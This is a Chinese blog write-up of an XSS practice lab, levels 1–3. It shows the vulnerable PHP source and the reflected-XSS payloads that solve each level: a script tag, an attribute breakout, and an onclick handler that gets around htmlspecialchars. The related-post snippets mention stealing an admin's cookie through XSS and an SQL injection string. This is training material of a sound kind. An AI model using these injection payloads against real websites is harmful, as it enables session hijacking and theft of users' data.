CTF-Web-XSS

最新推荐文章于 2023-07-13 15:15:07 发布
VIP文章 最新推荐文章于 2023-07-13 15:15:07 发布
阅读量715 收藏 1
点赞数
分类专栏: CTF Web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/beihai2013/article/details/113613145
版权

XSS靶机

level1

<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
## 若执行了alert,则执行以下语句
window.alert = function()  
{
        
confirm("完成的不错!");
 window.location.href="level2.php?keyword=test"; 
}
</script>
<title>欢迎来到level1</title>
</head>
<body>
<h1 align=center>欢迎来到level1</h1>
<h2 align=center>欢迎用户test</h2><center><img src=level1.png></center>
<h3 align=center>payload的长度:4</h3></body>
</html>

观察到URL为

http://192.168.64.2/xss/level1.php?name=test

整个PHP文件只有URL处有输入空间,且test直接在下列语句中显示

<h2 align=center>欢迎用户test</h2><center><img src=level1.png></center>

审计源码,直接显示test

<?php 
ini_set("display_errors", 0);
$str = $_GET["name"];
echo "<h2 align=center>欢迎用户".$str."</h2>";
?>

故payload为

http://192.168.64.2/xss/level1.php?name=<script>alert(1)</script>

level2

keyword在php中为

<input name="keyword" value="test">

审计源码,做了htmlspecialchars的过滤

echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>

此处无法xss

还有一处用到了keyword

<input name=keyword  value="'.$str.'">

需要闭合尖括号和双引号,因此payload为

http://192.168.64.2/xss/level2.php?keyword="><script>alert(1)</script>

php的htmlspecialchars

&:转换为&amp;
":转换为&quot;
':转换为成为 '
<:转换为&lt;
>:转换为&gt;

ENT_COMPAT - 默认。仅编码双引号。
ENT_QUOTES - 编码双引号和单引号。
ENT_NOQUOTES - 不编码任何引号。

level3

<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>"."<center>
<form action=level3.php method=GET>
<input name=keyword  value='".htmlspecialchars($str)."'>
<input type=submit name=submit value=搜索 />
</form>
</center>";
?>

需要绕过htmlspecialchars

payload

' onclick='alert(1)

onclick中使用javascript

# 使用js事件的onclick
onclick=alert(1)
最低0.47元/天 解锁文章
beihai2013
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF-网络挑战
03-02
本项目只是对历届CTF开源的网站 申明 由于本人重新向出题人申请重新对过渡进行修改发布的权利,但对每个题均标明了出处,如涉嫌犯罪,立马致歉删除。 对于部分没找到flag的翻译,会自己随便添加 对已提供Dockerfile及sql文件的过渡会做适当的修改(或者重写,因为有的过渡按给的文件运行不起来。。可能是我打开的方式不对),对于大部分没有的版本,会自己编写(复制粘贴)提供相应的文件 如有bug,还望知道 建造 每道译文对应的端口需要自行在run脚本中更改 cd the_challenge chmod 777 build run ./build ./run 分类 SQLi RCE XSS SSRF 未盐化 文件包含 XXE 科学技术研究院
CTF-WEB入门DOC-2019版1
08-03
1. 明确自己打CTF是为了娱乐,还是为了以后的工作发展 2. 如果是为了工作,那么需要一颗非常有毅力的心 3. 做好放弃周末休息时间的准备 4. 你的绝大多数
嵌入式web -- cgi案例 -- 前后端数据传递
m0_60292931的博客
06-10 2031
前后端分离的简单测试
CTF-【NSCTF 2015】WEB11 条件竞争
关注网络安全、云原生安全
12-21 4865
简介 条件竞争是指多进程/多线程情况下对于共享资源没有加锁,导致的问题。 源代码 <html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>NSCTF</title> </head> <body alink="#007000" background="../images/dot.gif" bgcolor="#
BuuCTF[第二章 web进阶]XSS闯关
m_de_g的博客
07-27 5123
** [第二章 web进阶]XSS闯关 ** 一、解题思路 1.一来看了一下题目的说明 我们需要执行alert函数 那就开启闯关模式,第一关,一看这个URL就很奇怪没直接上手,二话没说成功下一关 http://491c2e5e-9e61-408a-b82d-6615548d150b.node4.buuoj.cn/level1?username=<script>alert('xss')</script> 通过观察url,我惊奇的发现闯关的关卡,是由level1,level2…,我
web-ctfctf-pikachu-XSS
一个努力生活的人的博客
06-27 2158
XSS-pikachu
CTFweb方向的XSS
cutesharkl的博客
07-13 551
XSS概述:XSS是一种Web安全漏洞,它允许攻击者将恶意脚本注入到受害者的Web应用程序中,从而在用户的浏览器中执行该脚本。这种攻击可以导致各种问题,包括窃取用户登录凭据、会话劫持、网页篡改等。
CTF8-XSS闯关 知识点:XSS,JavaScript
m0_51326092的博客
08-04 803
前言 今日心血来潮,把前几个星期发现的XSS闯关拿来玩了一下,发现自己是真的菜。。不过看了一些大佬的博客,还是学到了一些JS的语法和xss的绕过姿势的!!! 大佬博客: xss小游戏全通关-答案 test.ctf8 xss注入解题记录 Web安全测试学习笔记 - XSS靶场 - test.ctf8.com HTML实体字符转换 在线编码网站 解题payload: level1:?name=<script>alert(1);</script> level2:?keyword=" οnc
Web-CTF-Cheatsheet:Web CTF速查表:cat:
04-29
WEB CTF备忘单 目录 MySQL 微软SQL Oracle SQLite的 PostgreSQL MS Access LFI 上载 序列化 PHP序列化 Python泡菜 Ruby元帅 Ruby YAML Java序列化 .NET序列化 SSTI / CSTI Flask / Jinja2 嫩枝/ Symfony ...
CTF Web各种题目的解题姿势
07-27
课时6:CTF SQL基于约束注入原理与利用12'22 课时7:SQL注入基于时间注入的原理与利用50'13 课时8:SQL基于时间盲注的Python自动化解题22'45 课时9:Sqlmap自动化注入工具介绍23'47 课时10:Sqlmap自动化注入...
xss注入讲解ppt.pptx
08-10
三种xss基础知识的讲解
CTFshow刷题日记-WEB-XSS(web316-333)
Love&Share
09-29 4021
web316-无过滤反射型XSS 大概就是要生成Xss代码链接,获取管理员cookie,后台bot每隔一段时间自动点击链接 方法一:xss平台 利用xss平台生成链接 xss平台 https://xsshs.cn/,https://xss.pt/,http://xsscom.com 在xss平台创建项目,选择默认模块即可,复制生成的xss代码,复制到题目留言框中 刷新下页面,然后在平台查看项目 方法二:自动接收脚本 在自己的服务器上放一个PHP代码 # a.php <?php $cookie
ctf课堂小练——web 杂项 xss攻击 图片隐写基础训练
qq_56074599的博客
09-14 1061
ctf课堂小练——web 杂项 xss攻击 图片隐写基础训练
CTF-web 第六部分 验证码类和初步XSS知识
iamsongyu的博客
10-17 2453
在登陆中通常我们需要验证码,但有些时候在设计的时候会存在一些漏洞。  1)一次验证     在验证中 随意填写账户密码 验证码正确填写 username=admin&amp;pwd=1234&amp;vcode=28ps&amp;submit=submit pwd error     第二次重复提交显示的是 pwd error 说明对验证有漏洞     已知密码为纯四位,我们使用burp ...
xss-labs level 1-10 攻略
borrrrring的博客
02-02 575
level 1 我们可以看到在payload中可以看到参数name,值为text,字符的长度为4,参数name的返回值会出现在界面上。 查看源代码 我们可以看到,参数name插入到了标签中,可以得出这是反射型XSS漏洞。 什么是反射型XSS?简单来说,就是当用户在网站的地址栏输入URL,从服务端获取到数据时,网站页面会根据返回的信息而呈现不同的返回页面,如果这个时候恶意用户在页面中输入的数据不经过验证且不经过超文本标记语言的编码就录入到脚本中,就会产生漏洞。 而且在源代码中我们还可以看到有一个关于窗口的语句
XSSgame writeup
a370793934的专栏
11-26 376
Level1 看源码有name传参,地址栏构造?name=<script>alert(1)</script> 或者?name=<svg/onload=alert(1)> Level2 分析代码,仍然是使用get方法,从url中接受一个keyword参数,不过这里用到一个过滤函数htmlspecialchars()这个函数把预定义的字符转换为 HTM...
XSS Chanllenges笔记
fuyingyinger的博客
11-17 561
https://blog.csdn.net/taozijun/article/details/81277187
ctf 反序列化字符逃逸
giaogiao123的博客
12-17 870
第一种,关键词过滤,变多的 比如0ctf :piapiapia 我先说一次什么是反序列化字符逃逸。 <?php class user{ public $user = 'admin'; public $pass = 'passwd'; } $a = new user(); $b = serialize($a); echo $b."<br>";
ctfshow-web-web红包题
最新发布
07-14
### 回答1: ctfshow-web-web红包题是一道CTF比赛中的网络安全题目。这道题目的背景是一个在线购物网站,要求我们通过安全漏洞来获得网站的红包。 首先,我们可以检查网站的源代码,寻找可能存在的漏洞。在网站的前端页面中,我们注意到了一个提交订单的功能,并且发现了其中一个参数可以被用户任意修改。这可能导致一个被称为SQL注入的漏洞。 我们试图通过在参数中插入恶意代码来进行SQL注入攻击。我们发现当我们输入`' or 1=1 -- `时,查询结果会返回所有订单记录,而不仅仅是当前用户的订单。这表明成功利用了SQL注入漏洞。 接下来,我们要尝试进一步利用这个漏洞来获取网站的红包。我们可以通过构建特制的SQL语句来绕过登录过程,直接获取红包的信息。 最终,我们成功地利用了网站存在的漏洞,获取到了红包的相关信息。这个过程展示了在网络安全竞赛中,如何通过分析代码和利用漏洞来实现攻击的目标。 在这个过程中,我们需要具备对SQL注入漏洞的理解和掌握,并且需要有一定的编程和网络安全知识。通过解决这样的题目,我们可以提高我们对网络安全攻防的认识和技能,以更好地保护网络安全。 ### 回答2: ctfshow-web-web红包题是一个CTF(Capture the Flag)比赛中的Web题目,目标是通过分析Web应用程序的漏洞来获取红包。CTF比赛是一种网络安全竞赛,在这种比赛中,参赛者需要通过解决各种不同类型的安全挑战来积分。 该题目中的Web应用程序可能存在一些漏洞,我们需要通过分析源代码、网络请求和服务器响应等信息来找到红包的位置和获取红包的方法。 首先,我们可以查看网页源代码,寻找可能的注入点、敏感信息或其他漏洞。同时,我们还可以使用开发者工具中的网络分析功能来查看浏览器和服务器之间的通信内容,找到可能存在的漏洞、密钥或其他敏感信息。 其次,我们可以进行输入测试,尝试不同的输入来检查是否存在注入漏洞、文件包含漏洞、路径遍历漏洞等。通过测试和观察响应结果,我们可以得到一些重要的信息和线索。 最后,我们可以分析服务器响应和错误信息,查找可能存在的网站配置错误、逻辑漏洞或其它任何可以利用的安全问题。此外,我们还可以使用常见的Web漏洞扫描工具,如Burp Suite、OWASP ZAP等,来辅助我们发现潜在的漏洞。 通过以上的分析和测试,我们有可能找到获取红包的方法。然而,具体的解题方法还需要根据题目中的具体情况来确定。在CTF比赛中,每个题目的设置都可能不同,解题的方法和思路也会有所差异。因此,在解题过程中,要保持敏锐的观察力和灵活的思维,尝试不同的方法和技巧,才能成功获取红包并完成任务。 ### 回答3: ctfshow-web-web红包题是一个CTF比赛中的网络题目,其目标是寻找并利用网页内的漏洞,获取红包。 首先,我们需要分析该网页的源代码,寻找可能存在的漏洞。可以通过审查元素、浏览器开发者工具等方式进行源代码分析。 其中,可能存在的漏洞包括但不限于: 1. 文件路径遍历漏洞:通过对URL的参数进行修改,尝试访问其他目录中的文件。 2. XSS漏洞:通过在用户输入的地方注入恶意代码,实现攻击者想要的操作。 3. SQL注入漏洞:通过修改数据库查询参数,获取未授权的数据。 4. 文件上传漏洞:上传恶意文件并执行。 一旦发现漏洞,我们需要进一步利用它们来获取红包。例如,如果存在文件路径遍历漏洞,我们可以尝试通过修改URL参数的方式,访问网站服务器上存放红包的文件目录,获取目录中的文件。 如果存在XSS漏洞,我们可以尝试在用户输入的地方注入一段JavaScript代码,以获取网页中的敏感信息或执行一些恶意操作,如窃取cookies。 如果存在SQL注入漏洞,我们可以尝试通过修改数据库查询参数,获取未授权的数据,如红包的具体位置或密码。 如果存在文件上传漏洞,我们可以尝试上传一个特殊设计的恶意文件,以执行任意命令或获取服务器上的文件。 综上所述,ctfshow-web-web红包题需要我们深入分析网页代码,发现可能存在的漏洞,并利用这些漏洞获取红包。这个过程需要我们对常见的漏洞类型有一定的了解,并具备相关的漏洞利用技术。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值